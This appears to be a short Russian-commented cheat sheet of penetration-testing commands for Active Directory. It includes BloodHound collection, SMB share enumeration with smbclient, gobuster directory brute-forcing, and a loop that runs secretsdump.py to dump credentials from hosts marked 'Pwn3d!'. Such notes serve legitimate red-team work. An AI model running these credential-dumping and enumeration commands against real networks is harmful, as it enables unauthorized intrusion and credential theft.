# bloodhound
pip install bloodhound
bloodhound-python -c all -d domain.ru -u user -p 'qwerty1234'


# копирование файлов
find . -name '*.rsc' -exec cp -b "{}" ./dirictory/ \;

# греп подсетей
cat ./* | grep -oP '[\d]+.[\d]+.[\d]+.[\d]+/[\d]+' | sort -V | uniq

#греп доменных имен и ipv4
cat ./* | grep -oP '([0-9a-zA-Z-_]+\.)+[0-9a-zA-Z-_]+' | sort -V | uniq

# просмотр всех шар
for i in $(bshm use net/smb/nxc-parser -f ./shares_user.txt --item 7 --ge print IPC); do echo -E $i; smbclient $i  -U 'domain\user%pass'; echo;  done

# Автодамп по кредам
for i in $(bshm use ad/smb/xnxc -f #NXC-ЛОГ-С-КРЕДАМИ# --item 6 --gi '(Pwn3d!)'); do secretsdump.py -outputfile ${i##*@} $i; done

# gobuster
gobuster dir --retry --expanded --no-error --no-color --quiet --useragent $useragent --threads $threads --wordlist ./testwl.txt --url $url --status-codes 200-208,226,400,401,403,405,500-511 --status-codes-blacklist '' --output result_dirbrute.txt

# Отчиска названия файлов от лишних символов
 | sed -e 's/[^A-Za-z0-9._-]/_/g'